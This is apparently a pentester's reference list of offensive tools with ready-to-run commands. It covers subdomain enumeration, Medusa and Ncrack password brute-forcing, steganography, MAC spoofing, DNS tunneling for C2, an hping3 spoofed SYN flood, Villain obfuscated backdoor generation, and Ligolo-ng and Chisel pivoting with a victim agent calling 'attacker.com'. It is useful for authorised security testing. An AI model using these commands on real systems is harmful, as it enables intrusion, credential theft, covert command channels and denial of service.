Reference List
MassDNS – A high-performance DNS stub resolver for massive amounts of domains [Link]. In its repository, there is a file with one thousand DNS resolver IPs. See also Subjack: it scans a list of subdomains concurrently and identifies ones that are able to be hijacked [Link].
sudo apt install massdns massdns -r resolvers.lst -t A -w results.output domains.lst
ShuffleDNS – It is a tool capable of brute-force domain resolve and handle wildcard subdomains [Link].
GO111MODULE=on go get -v github.com/projectdiscovery/shuffledns/cmd/shuffledns wget https://github.com/blechschmidt/massdns/blob/master/lists/resolvers.txt ~/go/bin/shuffledns -h
Subdomain Bruteforcing:
~/go/bin/shuffledns -d example.com -w wordlist.lst -r resolvers.txt -t 200
To resolve a list of subdomains:
~/go/bin/shuffledns -d example.com -list subdomains.lst -r resolvers.txt subfinder -d example.com -silent | ~/go/bin/shuffledns -d example.com -r resolvers.txt
DNSProbe – perform multiple DNS queries (A, AAAA, CNAME, TXT, MX) with list of resolvers [Link].
GO111MODULE=on go get -v github.com/projectdiscovery/dnsprobe subfinder -d example.com -silent | ~/go/bin/dnsprobe -r cname subfinder -d example.com -silent | ~/go/bin/dnsprobe -r txt subfinder -d example.com -silent | ~/go/bin/dnsprobe -r mx subfinder -d example.com -silent | ~/go/bin/dnsprobe -r a subfinder -d example.com -silent | ~/go/bin/dnsprobe -r aaaa -silent
Amass – The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques [Link].
FEATURES
- DNS: Brute-forcing, rDNS sweeping, NSEC zone walking, Zone transfers, FQDN alterations/permutations, FQDN Similarity-based Guessing.
- Scraping: Ask, Baidu, Bing, BuiltWith, DNSDumpster, HackerOne, IPv4Info, RapidDNS, Riddler, SiteDossier, Yahoo.
- Certificates: Active pulls (optional), Censys, CertSpotter, Crtsh, FacebookCT, GoogleCT.
- APIs: AlienVault, Anubis, BinaryEdge, BGPView, BufferOver, C99, CIRCL, Cloudflare, CommonCrawl, DNSDB, GitHub, HackerTarget, Mnemonic, NetworksDB, PassiveTotal, Pastebin, RADb, ReconDev, Robtex, SecurityTrails, ShadowServer, Shodan, SonarSearch, Spyse, Sublist3rAPI, TeamCymru, ThreatBook, ThreatCrowd, ThreatMiner, Twitter, Umbrella, URLScan, VirusTotal, WhoisXML, ZETAlytics, ZoomEye.
- Web Archives: ArchiveIt, ArchiveToday, Wayback.
sudo apt install amass amass enum -d example.com amass enum -passive -d example.com -src
Jok3r – It is a framework that aids penetration testers for network infrastructure and web security assessments [Link]. It does automatically all the basic work with just a few prompts. Great for a starting point and obvious vulnerabilities.
Installing and executing:
sudo docker pull koutto/jok3r sudo docker run -i -t --name jok3r-container -w /root/jok3r -e DISPLAY=$DISPLAY -v /tmp/.X11-unix:/tmp/.X11-unix --shm-size 2g --net=host koutto/jok3r
The final image will be 16.4 GB big 🙁
Re-starting or getting a shell:
sudo docker start -i jok3r-container sudo docker exec -it jok3r-container bash
- ./jok3r.py info –checks http
- ./jok3r.py attack -t https://example.com/ –add2db default
- ./jok3r.py attack -t https://example.com/ –add2db default –fast
- ./jok3r.py db
- mission -h
- hosts
- services
- products
- vulns
- vulns –no-truncation
- creds
- report
To copy the reports to the host machine:
sudo docker cp jok3r-container:/root/jok3r/reports/ .
Medusa – x [Link].
medusa -d medusa -h 192.168.0.1 -u root -P passwords.txt -e ns -M smbnt medusa -H hosts.txt -U users.txt -P passwords.txt -T 20 -t 10 -L -F -M smbnt medusa -M smbnt -C combo.txt medusa -M smbnt -C combo.txt -H hosts.txt
- -d
- list available modules
- -q
- display module usage info
- -M
- mode
- -h
- hostname or IP
- -H
- list of hosts
- -u
- username
- -U
- list of users
- -p
- password
- -P
- list of passwords
- -C
- combo of entries
- -e
- additional password checks, n for no password and s for password = username
- -T
- total number of hosts
- -t
- total number of logins
Ncrack – Ncrack is a high-speed network authentication cracking tool developed by the nmap team [Link]. The supported protocols include SSH, RDP, FTP, Telnet, HTTP(S), POP3(S), IMAP, SMB, VNC, SIP, Redis, PostgreSQL, MySQL, MSSQL, MongoDB, Cassandra, WinRM, and OWA.
ncrack --user root -p ssh -P passwords.txt 10.10.10.10 ncrack -u root -p 22 -P passwords.txt -T5 10.10.10.10 ncrack -u root -p 21 -P passwords.txt -T 5 10.10.10.10 ncrack -u root -p 21 -P passwords.txt 10.10.10.10 ncrack -u root -p 3389 -P passwords.txt 10.10.10.10
SubBrute – Brute force app to discover subdomains [Link].
./subbrute.py example.com ./subbrute.py onedomain.com anotherdomain.com ./subbrute.py example.com > output.txt ./subbrute.py -t domainslist.txt
Steghide – A steganography tool that hides data in some of the least significant bits of pictures (.jpg, .bmp) or audio (.wav, .au) files [Link].
sudo apt install steghide steghide-doc -y steghide info fileName steghide embed -cf image.jpg -ef secret.txt -v steghide extract -sf image.jpg steghide embed -cf audio.wav -ef secret.txt -p password steghide --encinfo steghide embed -cf image.bmp -ef secret.txt -e des
StegCracker – Steganography brute-force utility to uncover hidden data inside files [Link].
pip3 install stegcracker stegcracker fileName /path/wordlist.txt
Zsteg – A tool that can detect hidden data in .png and .bmp files. [Link].
gem install zsteg zsteg fileName zsteg -a fileName zsteg -E "b8,rgb,lsb,xy" fileName > extracted.exe
Exiv2 – A command-line utility to read, write, delete and modify Exif, IPTC, XMP, and ICC image metadata [Link]. Official website [Link].
sudo apt install exiv2 -y exiv2 fileName
Binwalk – A tool for analyzing, reverse engineering, and extracting firmware images [Link].
sudo apt install binwalk -y binwalk fileName binwalk -e fileName
oleVBA – A script to parse OLE and OpenXML files such as MS Office documents, to extract VBA Macro code [Link].
olevba3 fileName.doc olevba3 fileName.xls
After extracting the VBA code from a document, you can use a web tool such as OnlineGDB [Link] to compile and run the code safely.
MACchanger – An utility that makes the manipulation of MAC addresses of network interfaces easier [Link].
sudo apt install macchanger -y macchanger -h macchanger -s eth0 sudo ifconfig eth0 down sudo macchanger -r eth0 sudo ifconfig eth0 up macchanger -s eth0
Spoof a known MAC address vendor:
macchanger -l macchanger -m 00:00:17:22:22:22 eth0
Alternatively:
sudo ifconfig eth0 down sudo ifconfig wlan1 hw ether 00:00:17:22:22:22 sudo ifconfig eth0 up ifconfig -a
DNScat2 – Designed to create an encrypted client-server channel over the DNS protocol (DNS Tunneling) [Link] [Link]. It is capable of multiple TCP tunnels for SSH and HTTP, for example. This is a good solution for C2 of malware and botnets and it requires a lot of workarounds to work properly. I recommend and prefer Iodine instead.
sudo apt install dnscat2 -y OR sudo apt install dnscat2-server -y sudo apt install dnscat2-client -y
Client
dnscat -h dnscat domain.com dnscat --dns domain=domain.com dnscat --dns domain=domain.com,server=8.8.8.8,port=53 dnscat --dns domain=domain.com,port=53 --no-cache dnscat --dns domain=domain.com,port=8053,type=A,CNAME
Using an established session:
session -i 12345 help exec -h shell
Server
dnscat2-server -h dnscat2-server dnscat2-server domain.com dnscat2-server domain1.com domain2.net dnscat2-server --dns 'host=127.0.0.1,port=53,domain=domain1.com,domain=domain2.com'
Iodine – Tunnels IPv4 traffic (TCP/UDP/ICMP) through DNS by creating a logical network interface on the clients and connecting them (up to 16) as a private network [Link] [Link]. This is high performance and very flexible piece of software for DNS Tunneling but does not offer encryption. It can also be used with a VPN.
sudo apt install iodine -y iodine -h
Server
Configure your domain with the following entries:
iodine IN NS iodine-ns.domain.com. iodine-ns IN A 200.200.200.200 OR iodine IN NS subdomain.duckdns.org.
Configure the server to route traffic from the Iodine network to the network interface that has internet access (in my case enp0s3
):
sudo sysctl -w net.ipv4.ip_forward=1 sudo iptables -t nat -A POSTROUTING -o enp0s3 -j MASQUERADE sudo iptables -t filter -A FORWARD -i enp0s3 -o dns0 -m state --state RELATED,ESTABLISHED -j ACCEPT sudo iptables -t filter -A FORWARD -i dns0 -o enp0s3 -j ACCEPT
Then start the service:
sudo iodined -f -P password 10.0.0.1 iodine.domain.com
If you do not specify a password on the command to run the application it will prompt you for a password.
The argument -f
is for keeping it running in the foreground to allow for troubleshooting during testings.
Note that a new network interface will be created with the name dns0
.
Client
sudo iodine -f -P password iodine.domain.com
This setup will use the present DNS server of the client’s network as the route for the packets. It is the way to go when the network restricts DNS traffic (port 53) only from the local trusted DNS server. This is how a captive portal can be bypassed.
For direct access to the Iodine server, make changes to the /etc/resolve.conf
accordingly:
nameserver 200.200.200.200
Then you can route all your traffic through the Iodine network interface (dns0
):
sudo route add -net 0.0.0.0/0 gw 10.0.0.1 dns0 OR sudo ip route add default via 10.0.0.1 dev dns0
hping3 – A command-line oriented packet assembler and analyzer. It supports TCP, UDP, ICMP, and RAW-IP protocols. This tools can be used for firewall and network testing, port scanning, fingerprinting, auditing, DoS/DDoS attacks, etc. Available at [Link] and [Link].
sudo apt install hping3 -y hping3 --help sudo hping3 -S 10.1.1.1 sudo hping3 -S 10.1.1.1 -p 8080 sudo hping3 -S 10.1.1.1 -p 8080 -c 10 sudo hping3 --scan 80-90,400-500 -A 10.1.1.1 sudo hping3 -1 10.1.1.x --rand-dest –I eth0 sudo hping3 -9 10.1.1.10 -V sudo hping3 -S 10.1.1.1 -a 192.168.1.1 -p 443 --flood -I tun0
Modes
- default mode
- TCP mode.
- -0 –rawip
- RAW IP mode.
- -1 –icmp
- ICMP mode.
- -2 –udp
- UDP mode.
- -8 –scan
- SCAN mode.
- -9 –listen
- listening mode.
WhatWeb – It is a web scanner that identifies the technology stack that powers a website, such as web service, framework, language, etc [Link].
whatweb https://example.com
NetDiscover – Active/passive ARP reconnaissance tool [Link].
netdiscover -h sudo netdiscover -r 192.168.1.0/24 sudo netdiscover -p sudo netdiscover -i eth0 sudo netdiscover -i eth0 -P -N
Note: use the -P and -N if needed to pipe the output in another application. It will print in text format without headers. TO be stealthy scan in passive mode with -p. It will only sniff and not send any message, that could announce its presence and scanning to IDS/IPS.
Zmap – Zmap
Zgrab – Zgrab
ZDNS – ZDNS
Villain – a backdoor generator and multi-session handler for Windows and Linux [Link]. It allows collaborative engagement by connecting encryptedly sibling servers in order to share sessions under same/multi segments of network.
git clone https://github.com/t3l3machus/Villain cd ./Villain pip3 install -r requirements.txt sudo Villain.py [-h] [-p PORT] [-x HOAX_PORT] [-c CERTFILE] [-k KEYFILE] [-u] [-q]
Commands
- help
- Shows commands and usage information.
- generate os=windows lhost=eth0
- Generates a payload for Windows that will connect back to the IP of the network interface specified (eth0 for instance).
- generate os=windows lhost=eth0 obfuscate
- Same as above but with obfuscating of the code to avoid operating system’s defenses.
- sessions
- lists active sessions
- shell 897df98-7a897f0a-98d7f98
- Connects to a session with by Session ID.
- exec ~/script.ps1 897df98-7a897f0a-98d7f98
- Executes a Power Shell script against a Windows session.
- connect 192.168.111.111
- Connects to another server instance. It requires approving the connection in less than 10 seconds.
- siblings
- Lists the connected sibling servers.
dnsTwist – A fuzzer for finding existent domain typo-squatting candidates [Link].
sudo apt install dnstwist -y dnstwist -r domain.com
Ligolo-ng – It is a reverse VPN connection for pivoting (lateral movement) in a pentest engagement written in Go [Link]. The attacker machine is actually the server that will receive a connection back from an internal network that probably sits behind a NAT. The communication is encrypted with TLS and hard to be distinguished from regular web navigation traffic. It creates a tunnel interface in user land and is also compatible with IPv6.
From the attacker machine – Server
go build -o proxy cmd/proxy/main.go sudo ip tuntap add user $(whoami) mode tun ligolo sudo ip link set ligolo up sudo ufw allow 80,443/tcp ./proxy -autocert -laddr 0.0.0.0:443 sudo ip route add 10.0.0.0/24 dev ligolo
Note: this will automatically issue Let’s Encrypt certificates for Internet facing infrastructure or to appear to be legitimate on monitored networks. Optionally, -selfcert
, can be used to skip this requirement, then on the agent the argument -ignore-cert
will be necessary to skip verification. Optionally a list of accepted domains can be passed -allow-domains
. Port 80 needs to be open for satisfying Let’s Encrypt challenges.
From the victim machine – Client / Agent
go build -o agent cmd/agent/main.go ./agent -connect attacker.com:443
Operating
Up on the connection is established, on the C2 (server-side) use the following command accordingly.
>> session >> ifconfig >> listener_list >> start >> stop
Chisel is a single executable including both client and server written in Go and feature tunnel traffic over HTTP making is stealth in monitored networks [Link]. It allow multiple tunnels simultaneously and TLS (HTTPS) that is automatically issues from Let’s Encrypt.
sudo apt install chisel -y
OR
$ go install github.com/jpillora/chisel@latest
On the attacker side: Server
chisel server -p 80 --reverse chisel server -p 443 --reverse --tls-domain example.com
On the pivot side: Client
chisel client 200.200.200.200:80 R:socks chisel client https://200.200.200.200:443 R:0.0.0.0:1080:socks